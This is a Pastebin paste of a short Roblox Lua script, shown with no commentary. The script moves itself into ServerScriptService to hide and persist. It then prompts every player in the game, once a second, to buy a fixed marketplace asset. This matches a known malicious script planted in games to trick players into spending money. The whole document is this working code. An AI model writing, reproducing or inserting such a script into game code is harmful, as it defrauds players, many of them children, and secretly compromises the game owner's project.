Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- script.Parent = game.ServerScriptService
- assetId= 123008745
- ms=game:service'MarketplaceService'
- while wait(1) do
- for _,v in pairs(game.Players:children'') do
- ms:PromptPurchase(v, assetId)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement